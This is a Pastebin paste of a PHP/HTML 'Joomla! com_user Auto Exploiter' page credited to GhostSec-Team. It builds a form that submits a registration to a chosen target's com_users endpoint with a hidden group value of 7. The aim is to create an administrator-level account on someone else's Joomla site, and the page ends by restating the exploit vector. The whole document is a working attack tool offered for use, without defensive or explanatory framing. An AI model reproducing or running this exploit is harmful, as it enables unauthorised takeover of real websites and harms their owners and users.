CaFc_Br40ck

com_user

Aug 12th, 2015
313
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $target = $_REQUEST['target'];
  3. $token = $_REQUEST['token'];
  4. $email = $_REQUEST['email'];
  5. $submit = $_REQUEST['submit'];
  6. if ($target == "") {
  7.     $target = "localhost";
  8. }
  9. ?>
  10. <!DOCTYPE HTML PUBLIC "-//W3C//
  11. DTD HTML 3.2 Final//EN">
  12. <html>
  13.  <head>
  14.   <title>Joomla Exploiter</title>
  15. <link rel="stylesheet" type="text/css" href="http://reziktumbas.heck.in/files/style.css" media="all,handheld"/>
  16.  
  17.  </head>
  18.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  19. <center><b><font face="tempus" color="lime" size="5">[</font><font face="tempus" color="red" size="5">+</font><font face="tempus" color="lime" size="5">] </font>
  20. <font face="tempus" color="lime" size="5">Joomla! com_user Auto Exploiter</font>
  21. <font face="tempus" color="lime" size="5"> [</font><font face="tempus" color="red" size="5">+</font><font face="tempus" color="lime" size="5">]</font>
  22. </b></center><br>
  23. <br><br>
  24. <font color="lime" size="4">
  25. <form method="post" action="">
  26. Target :<br>
  27. <input type="text" name="target" value="" size="25"><br>
  28. Token :<br>
  29. <input type="text" name="token" value="" size="25"><br>
  30. Email :<br>
  31. <input type="text" name="email" value="" size="25"><br>
  32. <button type="submit" class="login" name="submit">submit</button>
  33. </form><br>
  34.  
  35. <form id="member-registration" action="http://<?php echo "$target"; ?>/index.php?option=com_users&view=registration" method="post" class="form-validate">
  36. <fieldset>
  37. <legend>Konfirmasi</legend>
  38. <dl><dt><span class="spacer"><span class="before"></span><span class="text"><label id="jform_spacer-lbl" class=""><strong class="red">*</strong> Required field</label></span><span class="after"></span></span>               </dt>
  39.           <dd> </dd>
  40.     <dt>
  41.             <label id="jform_name-lbl" for="jform_name" class="hasTip required" title="Name::Enter your full name"></label>                        </dt>
  42.            <dd><input type="hidden" name="jform[name]" id="jform_name" value="Joomla Exploiter" class="required" size="25"/></dd>
  43.                             <dt>
  44.             <label id="jform_username-lbl" for="jform_username" class="hasTip required" title="Username::Enter your desired user name">Username :</label>                        </dt>
  45.        <dd><input type="text" name="jform[username]" id="jform_username" value="" class="validate-username required" size="25"/></dd>
  46.                                 <dt>
  47.             <label id="jform_password1-lbl" for="jform_password1" class="hasTip required" title="Password::Enter your desired password - Enter a minimum of 4 characters">Password :</label>                        </dt>
  48.       <dd><input type="password" name="jform[password1]" id="jform_password1" value="" autocomplete="off" class="validate-password required" size="25"/></dd>
  49.                           <dt>
  50.             <label id="jform_password2-lbl" for="jform_password2" class="hasTip required" title="Confirm Password::Confirm your password">Confirm Password :</label>                        </dt>
  51.       <dd><input type="password" name="jform[password2]" id="jform_password2" value="" autocomplete="off" class="validate-password required" size="25"/></dd>
  52.                              <dt>
  53.             <label id="jform_email1-lbl" for="jform_email1" class="hasTip required" title="Email Address::Enter your email address"></label>                        </dt>
  54.         <dd><input type="hidden" name="jform[email1]" class="validate-email required" id="jform_email1" value="<?php echo "$email"; ?>" size="25"/></dd>
  55.                               <dt>
  56.             <label id="jform_email2-lbl" for="jform_email2" class="hasTip required" title="Confirm email Address::Confirm your email address">Email :</label>                    </dt>
  57.         <dd><input type="text" name="jform[email2]" class="validate-email required" id="jform_email2" value="<?php echo "$email"; ?>" size="25"/></dd>
  58. <input type="hidden" name="jform[groups][]" value="7" size="25">
  59.               </dl>
  60.  
  61. <hr>
  62. <p><span style="color:#FF4747">Password terserah mau diisi apa :v !!!</span></p>
  63. </fieldset>
  64.       <div>
  65.          <span class="wto-button-wrapper"><span class="wto-button-l"> </span><span class="wto-button-r"> </span><button type="submit" class="login">Exploit...!!</button></span>
  66.          <input type="hidden" name="option" value="com_users" />
  67.          <input type="hidden" name="task" value="registration.register" />
  68.          <input type="hidden" name="<?php echo "$token"; ?>" value="1" />      </div>
  69. </form>
  70.  
  71. <hr>
  72. exploit :<br>
  73. index.php?option=com_users&view=registration<br>
  74. <input name="jform[groups][]" value="7" size="25">
  75. <hr><br>
  76. <center><font size="5">&copy;2014 Coded by :  GhostSec-Team</font></center><br>
  77. </body></html>
RAW Paste Data